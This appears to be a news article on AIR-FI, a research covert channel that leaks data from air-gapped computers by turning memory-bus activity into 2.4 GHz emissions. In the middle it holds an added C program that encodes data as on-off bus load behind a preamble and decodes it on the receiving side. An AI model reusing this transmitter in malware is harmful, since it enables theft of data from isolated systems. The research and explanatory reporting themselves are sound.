A new proof-of-concept exploit called Air-Fi can turn a secure, air-gapped computer into a Wi-Fi transmitter that can help a hacker exfiltrate sensitive data.
An air-gapped computer is a computer that is completely disconnected from any network. Many air-gapped machines have every possible network feature removed, from Wi-Fi to Bluetooth, but this exploit shows that hackers can use DDR SDRAM buses “to generate electromagnetic emissions in the 2.4 GHz Wi-Fi bands and encode binary data on top of it,” according to the researcher Mordechai Guri of the Ben-Gurion University of the Negev, Israel.
“This technique required high levels of skills from the attacker, in both design and implementation,” said Guri in an email. “However, there are simpler covert exfiltration channels for conventional IT environments in the wild. This one is focusing on leaking data from air-gapped computers where the traditional network-based covert channels fail.”
“Using the Wi-Fi medium in such a non-conventional way is something that I’ve been examining during the last year,” he said.
The transmissions are invisible to other devices; only the attacker, using specially prepared software and hardware, can pick them up.
As a part of the exfiltration phase, the attacker might collect data from the compromised computers. The data can be documents, key logging, credentials, encryption keys, etc. Once the data is collected, the malware initiates the AIR-FI covert channel. It encodes the data and transmits it to the air (in the Wi-Fi band at 2.4 GHz) using the electromagnetic emissions generated from the DDR SDRAM buses.
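To make the "encode and transmit" step concrete, here is an added example in C that is not code from Guri's paper or from the article. It assumes a simple on-off keying scheme of our own choosing: in a "1" time slot the malware streams data through a buffer far larger than the CPU caches so that the DDR bus stays busy, and in a "0" slot it idles; a preamble byte (0xA5), a 100 ms slot length, the payload and the receiver's energy samples are all constructed for illustration and are not the parameters of the real AIR-FI channel. The same block also shows the receiver's side: thresholding per-slot signal energy back into symbols and locating the preamble to recover whole bytes.

```c
/* Added example: a minimal on-off-keying framing layer over a "memory bus
 * activity" channel. Not from the AIR-FI paper; the preamble, slot length and
 * buffer size are assumptions for illustration. */
#define _POSIX_C_SOURCE 199309L
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <time.h>

#define BUF_BYTES  (64u << 20)   /* 64 MiB: larger than any cache, so copies hit the bus */
#define PREAMBLE   0xA5          /* 10100101: lets the receiver find the frame start */
#define SLOT_MS    100           /* hypothetical slot length in milliseconds */

/* Transmitter: keep the DRAM bus busy for `ms` milliseconds ("1" symbol) by
 * streaming a large buffer, or idle for the same time ("0" symbol). */
static void emit_slot(int bit, unsigned ms) {
    struct timespec start, now;
    clock_gettime(CLOCK_MONOTONIC, &start);
    if (!bit) {
        struct timespec rest = { ms / 1000, (long)(ms % 1000) * 1000000L };
        nanosleep(&rest, NULL);
        return;
    }
    uint8_t *a = malloc(BUF_BYTES), *b = malloc(BUF_BYTES);
    if (!a || !b) { free(a); free(b); return; }
    memset(a, 0x5A, BUF_BYTES);
    for (;;) {
        memcpy(b, a, BUF_BYTES);   /* read and write traffic on the memory bus */
        a[0] ^= 1;                 /* mutate the source so the copy is not hoisted */
        clock_gettime(CLOCK_MONOTONIC, &now);
        double elapsed = (now.tv_sec - start.tv_sec) * 1e3
                       + (now.tv_nsec - start.tv_nsec) / 1e6;
        if (elapsed >= ms) break;
    }
    free(a); free(b);
}

/* Serialise a frame into slot symbols: the preamble byte, then each payload
 * byte MSB first. Returns the number of slots written, or -1 if `slots` is too small. */
int encode_frame(const uint8_t *data, size_t len, uint8_t *slots, size_t max_slots) {
    size_t need = 8 * (len + 1), n = 0;
    if (need > max_slots) return -1;
    for (size_t i = 0; i <= len; i++) {
        uint8_t byte = (i == 0) ? PREAMBLE : data[i - 1];
        for (int b = 7; b >= 0; b--) slots[n++] = (byte >> b) & 1;
    }
    return (int)need;
}

/* Receiver: threshold per-slot energy in the 2.4 GHz band into 0/1 symbols. */
void classify_slots(const double *energy, size_t n, double threshold, uint8_t *slots) {
    for (size_t i = 0; i < n; i++) slots[i] = energy[i] > threshold;
}

/* Receiver: find the preamble, then recover whole payload bytes after it.
 * Returns the number of bytes decoded, or -1 if no preamble was seen. A noisy
 * slot that happens to spell 0xA5 early would misalign the frame; a real
 * channel needs a longer sync word and error detection on top of this. */
int decode_frame(const uint8_t *slots, size_t nslots, uint8_t *out, size_t max_out) {
    size_t start = 0;
    int found = 0;
    for (; start + 8 <= nslots; start++) {
        uint8_t v = 0;
        for (int b = 0; b < 8; b++) v = (uint8_t)((v << 1) | (slots[start + b] & 1));
        if (v == PREAMBLE) { found = 1; break; }
    }
    if (!found) return -1;
    size_t pos = start + 8, n = 0;
    while (pos + 8 <= nslots && n < max_out) {
        uint8_t v = 0;
        for (int b = 0; b < 8; b++) v = (uint8_t)((v << 1) | (slots[pos + b] & 1));
        out[n++] = v;
        pos += 8;
    }
    return (int)n;
}

/* Stand-alone demo: modulate bus load with a constructed two-byte payload. */
int main(void) {
    const uint8_t msg[] = "OK";          /* constructed sample payload */
    uint8_t slots[64];
    int n = encode_frame(msg, 2, slots, sizeof slots);
    if (n < 0) return 1;
    for (int i = 0; i < n; i++) {
        putchar(slots[i] ? '1' : '0');
        fflush(stdout);
        emit_slot(slots[i], SLOT_MS);
    }
    putchar('\n');
    return 0;
}
```

Run as a normal user on Linux; each slot occupies 100 ms, so the two-byte demo takes about 2.4 seconds and allocates 128 MiB. Whether the resulting emissions are actually detectable by a nearby Wi-Fi receiver depends on the memory hardware and the receiver setup, which is exactly the part of the research this example does not reproduce.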
Guri is well-known in security circles for figuring out how to attack air-gapped machines. In 2019 he used screen brightness and power lines to transmit data from secure computers, and in 2018 he was also able to transmit data via ultrasonic audio signals from an ordinary computer speaker.
In this exploit, Guri was able to force the DDR SDRAM buses to transmit to compromised Wi-Fi-capable devices like laptops and smartphones. He tested the exploit on four workstations, each outfitted with similar 4GB DIMM DDR4 or DDR3 RAM sticks. The rest of the hardware was bog-standard and ran the Ubuntu operating system.
The exploit does require the attacker to have code running on the computer's operating system, which means the machine has to be infected before it can start sending out data. Further, once the computer is transmitting via its memory bus, the attacker must have a receiver no more than a few feet away from the machine to capture the Wi-Fi-band signals, which makes this exploit more interesting than dangerous.
“Interestingly, in the past, we have successfully demonstrated exfiltration via covert FM radio signals generated from the monitor, then we introduced how attackers can produce cellular frequencies from the computer to leak data. It was natural that the next candidate will be Wi-Fi. This one was also the most challenging one,” said Guri.